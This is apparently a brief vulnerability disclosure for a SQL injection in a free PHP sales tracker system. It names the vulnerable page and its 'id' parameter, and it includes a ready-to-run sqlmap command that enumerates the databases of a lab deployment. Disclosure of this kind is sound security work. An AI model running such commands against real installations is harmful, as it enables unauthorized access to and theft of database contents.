Download sourcecode from https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
Deploy the system
The sql injection url: http://192.168.131.135/php-sts/admin/clients/manage_client.php?id=1 Vulnerability trigger parameter: id
sourcecode:
sqlmap : sqlmap.py -u "http://192.168.131.135/php-sts/admin/clients/manage_client.php?id=1" -p id --risk 3 --dbs